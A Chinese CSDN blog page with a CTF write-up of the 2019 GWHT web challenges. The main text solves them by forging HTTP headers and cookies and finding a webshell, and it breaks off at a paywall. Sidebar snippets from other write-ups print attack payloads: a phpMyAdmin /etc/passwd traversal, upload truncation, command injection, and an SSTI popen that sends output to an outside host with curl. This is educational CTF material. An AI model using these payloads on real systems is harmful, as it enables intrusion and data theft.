GWHT的神奇的web复现

最新推荐文章于 2023-03-11 11:30:03 发布
最新推荐文章于 2023-03-11 11:30:03 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: GWHT
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44307072/article/details/88632510
版权

2019GWHT考核题神奇的web复现–wp

1、web签到题

网址:http://xiaorouji.cn:2334/web1/
第一题我真的是醉了,想想没有bp去打题,真的是令我原地自闭,后来装了bp这道题就慢慢的好解了

首先是一串装帅的字符串输出,很可惜并没有什么用处。
在这里插入图片描述
紧接着跳到index.php的网页,接着出现下图:
在这里插入图片描述
EMMMM…看起来真神奇啊,翻译过来就是运用bp修改一下,改成用GWHT的“浏览器”浏览登录,很明显是要我们改访问的浏览器:
在这里插入图片描述

然后就出现了下面这一段话,显示只接受www.gwht.com的访问,于是修改访问网址就好啦~
在这里插入图片描述
紧接着是出现了下图:
在这里插入图片描述
这个表示是要求本地访问
然后就是变成下图:
在这里插入图片描述
要求用accept语言是e西班牙语,但是在此注明是es-es,谷歌是es-es但是百度是es,以谷歌为主。

上面修改的步骤一起写在下图了
在这里插入图片描述
最后的最后,最后是You have not logged in yet这条语句出现,改一下cookie–改login=1。

然后我们去看看抓的包,看到它会先跳去flag2333.php然后立刻转去noflag.php

于是最后看flag2333.php的包就能看到flag了
在这里插入图片描述
(终于做完这道题了,感觉反反复复抓包什么的,都快把题背下来了,不过最大的好处就是理解了这道题怎么做了,修改的地方的原因是什么)

2. do u know 菜刀?

网址:http://xiaorouji.cn:2333/web2/
这道题也是一道神奇的题目,首先得理解神马是菜刀–中国菜刀
为此我还特地去百度了一下:https://baike.baidu.com/item/中国菜刀/3963062?fr=aladdin

进入这道题的界面:
网址:http://xiaorouji.cn:2333/web2/
emmm…看到这个地方,得到一个假flag(反正是不可能直接给你flag),但是—有个提示(毕竟还是菜鸡)告诉你有个shell在web里

那就用御剑扫描吧…
网址:http://xiaorouji.cn:2333/web2/
然后访问一下shell.php文件
再查看源代码,得到了下图:
在这里插入图片描述
好的,这个地方是不是该运用“菜刀”了呢?
试着扔一把“菜刀”出去:

最低0.47元/天 解锁文章
没有任何buff的小菜鸡
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF-练习平台 Web writeup By Assassin [暂时完结]
Assassin
04-06 6万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
【pwn】gwctf_2019_easy_pwn
Nothing
12-09 903
例行检查 分析程序,这个程序是c++写的。在往s中read的时候大小没有问题,但是程序在下面将字符"I"替换成了"pretty",最后在strcpy的时候发生了溢出,没有PIE和canary直接利用即可。 from pwn import * io=remote('node3.buuoj.cn','27671') puts_plt=0x8048DC0 puts_got=0x804C068 main...
刷题(第三周)
qq_62046696的博客
03-11 725
sess_根我们生成的sha256编码,上传进去了,还差那个文件是否存在,发现upload有mkdir(里面的就是/var/babyctf/$attr)这里的attr我们可以控制,目录!简单来说,file_exits,如果是文件目录都可以为true,文件上传保存在/var/babyctf/$attr/$username/文件名,如果attr=success.txt,那么sess就保存在它里面,最后更改phpsessID为我们上传的sha256的值。变成我们的flag不就可以了吗。s:3:"123";
[GWCTF 2019]babyvm
weixin_52369224的博客
02-10 1407
系统学习vm虚拟机逆向 64位vm的题目 找到主函数 分析sub_CD1函数: sub_B5F代表mov操作,其中 0xE1,0xE2...代表不同的寄存器。 sub_A64是一个异或操作xor。 sub_AC5是一个读取操作并判断他的长度是否等于21 sub_956是空操作nop。 sub_A08 两个数相乘操作mul sub_8F0是一个交换操作swap sub_99c线性运算 该函数是对6010A0操作码内容的执行,一直到0x...
base64加密解密
AllenYu的博客
06-12 1万+
什么是base64:base64是一种常见的用于传输8Bit字节码的编码方式,是一种基于64个可打印字符来表示二进制数据的方法。 base64所用的字符为A到Z、a到z、0到9、+号符和/号符,他的索引(下标)从0开始,具体如下转换对照所示: 索引 对应字符 索引 对应字符 索引 ...
羊城杯2020 Easyphp2
qq_53755216的博客
06-24 1097
随便刷一刷 随便总结一下 随便涨点姿势 二话不说先目录扫描 但是扫出来一堆429.。。。 看了一下dirsearch的readme 发现了以下参数 -s DELAY, --delay=DELAY Delay between requests emmm 真不错 重新来! 还是429 .。。。发现线程是30 .。。。 -t THREADS, --threads=THREADS Number of threads
[GWCTF 2019]我有一个数据库
夜幕下的灯火阑珊的博客
05-14 1412
知识点 phpmyadmin任意文件读取 dirb扫描到后台有phpmyadmin目录,访问一下 版本为4.81,经查询,存在远程文件读取漏洞 直接上payload读取passwd文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 读取成功,尝试读...
i春秋 百度杯”CTF比赛(二月场) Misc&&web题解 By Assassin
热门推荐
Assassin
03-16 2万+
学习web,搞起来! 百度杯”CTF比赛(二月场)训练赛传送门爆破-1打开题目我们直接就看到源码,加上注释如下<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3238
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
[GWCTF 2019]我有一个数据库&&getshell
plant1234的博客
03-24 2737
BUU我有一个数据库&&getsholl 做这题的话目的是为了复现 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞 这题的话打开看是乱码,但查看响应还是有东西的: 多的不说先信息收集一波,直接扫目录,看页面有没有有用的信息 然后。 日常访问有没有:robots.txt 得到: 在发现有phpinfo.php 访问得到: 得到了后端脚本语言php的一些信息 扫描得到: 扫描发现有:phpmyadmin/ 直接访问得到: 发现没有要登陆省去了很多的步骤 尝试用
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4331
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
BMZCTF:flag
末初的CSDN博客
12-13 2844
http://bmzclub.cn/challenges#flag flag.png iVBORw0KGgoAAAANSUhEUgAAAN4AAABICAYAAACZWEvpAAAd0klEQVR4nO2debRdRZ3vP1W1h3PuuUMGMigJMyqvhaAijfJEg/EJCGK3grjUxuk9QRQRDSA+DaDtADwVbG0nWp88cWEYnq2oLT4aEAUajdoaZBAIEBJIcpObO5xz9lD1e39U7XNzL9jq0uVJ0vvLOivsc2rXrl1Vv7F
[GWCTF 2019]你的名字
qq_43801002的博客
07-28 1354
题目 过程 1.在 ssti 中过滤了后, 可以通过{%外带 {% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=ls /') %}1{% endif %} 由于有黑名单,这里使用得操作是利用blacklist里面最后一个进行绕过。 只要在其他语句加入他,那么就可以绕过其他语句了。 但是不知道他得blackl
[GWCTF 2019]枯燥的抽奖(mt_srand()爆种子,用公钥计算私钥)
xlcvv的博客
04-17 794
进到题目界面: 随意输入几个数: 那先F12审查一下,找到下面这些JS: 发现有个check.php文件,进去看一下,给了源码: Sdue7p0oKI <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed']...
BUUCTF--[羊城杯 2020]Easyphp2
qq_46263951的博客
08-18 1265
进入后的页面 根据题目提示我们可以知道这是一道PHP代码审计的题 所以使用伪协议查看源代码,这里使用的是两次url编码绕过 /?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php /?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php <!DOCTYPE html> &lt
redis、ES、mysql、MongoDB 对比
沉默的夏虫
05-28 2570
redis: 纯内存数据库,RDB和aof是为了数据恢复,key-value只能通过key查询,可以虚拟内存,弱事务 ES: 海量数据的文本检索数据库,查询快,增删改慢,一般是定期批量进行增删改(比如每天凌晨1点) mysql: 关系型,复杂联表条件查询,数据字段规整不经常变化,支持事务 MongoDB: 算是以上三者都沾一点,但是都不精,是个内存性数据库,可以虚拟内存,可以利用mmap加快对数据的操作速度 是个内存性数据库,但是速度没有redis快; 也支持文本检索但是量级太大速度就不行
CTF-安恒19年一月月赛部分writeup
weixin_34117211的博客
01-27 1676
CTF-安恒19年一月月赛部分writeup MISC1-赢战2019 是一道图片隐写题 linux下可以正常打开图片,首先到binwalk分析一下。 里面有东西,foremost分离一下 有一张二维码,扫一下看看 好吧 不是flag,继续分析图片,在winhex没有发现异常,那么上神器StegSolve分析一下 第一次翻了一遍图层没发现,眼瞎第二次才看见 ...
2019安恒一月月赛web1-babygo
0nc3的博客
01-28 1815
web1-babygo 考察知识点: PHP反序列化 POP链构造 由于还是个萌新…只会一点反序列化,还是第一次知道POP链构造,哭了 虽然没有写出来,但是想记录下这次学习过程 参考链接:https://www.anquanke.com/post/id/170341 下面为题目源码 &amp;amp;amp;amp;lt;?php @error_reporting(1); include 'flag.php'; cla...
[羊城杯 2020]Easyphp2 WP
wmicn的博客
09-15 1895
[羊城杯 2020]Easyphp2 进入题目,观察到两个点 1.是url中get的file参数 2.是题目要求 only people from GWHT are allowed to access this website 考虑先使用php伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php 测试发现是base64被过滤了,但是quoted-printable-encode并没有被过滤 ?file=php://filt
RROR 1045 (28000): Access denied for user 'dc_sheet_gwht'@'%' (using password: YES)
最新发布
12-01
2. 用户 'dc_sheet_gwht'@'%' 没有被授权访问该数据库。 3. MySQL 服务器没有在远程主机上启用远程访问。 为了解决这个问题,你可以尝试以下几个步骤: 1. 确认用户名和密码是否正确,可以尝试使用命令行或者其他 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值